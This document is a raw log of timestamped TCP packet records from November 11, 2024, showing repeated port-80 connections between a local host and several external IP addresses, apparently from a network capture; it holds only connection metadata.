                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.251327038 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.251338005 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.251389980 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.251389980 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.251816034 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.251851082 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.252008915 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.252019882 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.252032042 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.252043962 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.252054930 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.252060890 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.252060890 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.252388954 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.252840996 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.252896070 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.253021955 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.253031969 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.253070116 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.253070116 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.253417969 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.253431082 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.253459930 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.253721952 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.253731012 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.253745079 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.253774881 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.253774881 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.255470037 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.255549908 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.255582094 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.255695105 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.255731106 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.255731106 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.331645966 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.331742048 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.332623005 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.332802057 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.524477005 CET8050227154.212.231.82192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.524535894 CET5022780192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.756905079 CET5023480192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.765675068 CET8050234208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.765773058 CET5023480192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.776649952 CET5023480192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.786225080 CET8050234208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.898901939 CET5023580192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.899713039 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.903752089 CET80502353.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.903826952 CET5023580192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.904671907 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.904804945 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.087395906 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.092629910 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.221431971 CET8050234208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.223562002 CET5023480192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.470735073 CET8050228199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.471105099 CET5022880192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.295645952 CET5023580192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.300685883 CET80502353.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.389913082 CET80502353.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.389966965 CET5023580192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.396689892 CET80502353.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.396745920 CET5023580192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.400578976 CET5023880192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.406059980 CET8050238154.212.231.82192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.406114101 CET5023880192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.406519890 CET5023880192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.411389112 CET8050238154.212.231.82192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.418508053 CET5023980192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.423754930 CET805023944.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.423826933 CET5023980192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.424192905 CET5023980192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.429207087 CET805023944.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.469182968 CET5024080192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.470139980 CET5024180192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.474246025 CET80502403.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.474302053 CET5024080192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.475183964 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.475246906 CET5024180192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.475754023 CET5024280192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.475848913 CET5024380192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.480829000 CET805024244.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.480849981 CET8050243162.255.119.102192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.480885983 CET5024280192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.480920076 CET5024380192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.481998920 CET5024280192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.487613916 CET805024244.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.506819963 CET5024180192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.511802912 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.522728920 CET5024480192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.527710915 CET8050244178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.527787924 CET5024480192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.527920008 CET5024480192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.532928944 CET8050244178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.540594101 CET5024380192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.545913935 CET8050243162.255.119.102192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.582881927 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.582953930 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.583087921 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.583098888 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.583133936 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.583167076 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.583590031 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.583601952 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.583636045 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.583652973 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.584451914 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.584465027 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.584503889 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.584503889 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.585352898 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.585365057 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.585421085 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.586185932 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.586246967 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.587841034 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.587908030 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.588012934 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.588056087 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.588526964 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.588578939 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.664012909 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.664078951 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.664222956 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.664233923 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.664283037 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.664721012 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.664735079 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.664767981 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.664783001 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.665591002 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.665607929 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.665642023 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.665663004 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.666254997 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.666270018 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.666312933 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.666327000 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.667069912 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.667083979 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.667136908 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.667192936 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.667967081 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.667980909 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.667990923 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.668020964 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.668057919 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.668857098 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.668869972 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.668903112 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.668929100 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.669796944 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.669810057 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.669836044 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.669853926 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.670644045 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.670655966 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.670669079 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.670686960 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.670701027 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.670722961 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.671363115 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.671380997 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.671391964 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.671431065 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.671431065 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.671453953 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.704633951 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.704714060 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.704773903 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.704786062 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.704854012 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.704854012 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.745094061 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.745147943 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.745208979 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.745260954 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.851310968 CET805023944.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.851377964 CET5023980192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.858803988 CET805023944.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.858853102 CET5023980192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.909781933 CET805024244.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.909835100 CET5024280192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.917582989 CET805024244.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.917643070 CET5024280192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.940130949 CET8050244178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.940191031 CET5024480192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.940260887 CET5024480192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.945103884 CET8050244178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.030466080 CET8050243162.255.119.102192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.030524015 CET5024380192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.269490957 CET5024680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.274576902 CET805024691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.274657011 CET5024680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.274794102 CET5024680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.279789925 CET805024691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.291445971 CET8050238154.212.231.82192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.291523933 CET5023880192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.838155985 CET805021691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.838207960 CET5021680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.965106010 CET805024691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.965157986 CET5024680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.965285063 CET805024691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.965297937 CET805024691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.965334892 CET5024680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.965946913 CET805024691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.965959072 CET805024691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.965990067 CET5024680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.966801882 CET805024691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.966816902 CET805024691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.966836929 CET5024680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.966869116 CET5024680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.967444897 CET805024691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.967456102 CET805024691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.967467070 CET805024691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.967482090 CET5024680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.967505932 CET5024680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.970809937 CET805024691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.970952988 CET805024691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.970982075 CET5024680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.971002102 CET5024680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.971206903 CET805024691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.971237898 CET5024680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.053874969 CET805024691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.053997993 CET805024691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.054011106 CET805024691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.054045916 CET5024680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.054081917 CET5024680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.054538012 CET805024691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.054548979 CET805024691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.054583073 CET5024680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.055219889 CET805024691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.055232048 CET805024691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.055264950 CET5024680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.055927992 CET805024691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.056073904 CET5024680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.056160927 CET805024691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.056171894 CET805024691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.056195021 CET5024680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.056222916 CET5024680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.357505083 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.357693911 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.357750893 CET5024180192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.358042955 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.358055115 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.358097076 CET5024180192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.358808041 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.358824015 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.358863115 CET5024180192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.359776974 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.359791040 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.359829903 CET5024180192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.360200882 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.360213995 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.360253096 CET5024180192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.362662077 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.362870932 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.362876892 CET5024180192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.362917900 CET5024180192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.396841049 CET5023980192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.399182081 CET5024680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.399202108 CET5024680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.400324106 CET5024280192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.402118921 CET805023944.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.406481981 CET805024244.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.408363104 CET5023580192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.410176039 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.410300016 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.413244963 CET80502353.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.440531015 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.440593958 CET5024180192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.440696001 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.440709114 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.440746069 CET5024180192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.441358089 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.441370010 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.441410065 CET5024180192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.441965103 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.441986084 CET8050241199.191.50.83192.168.2.6
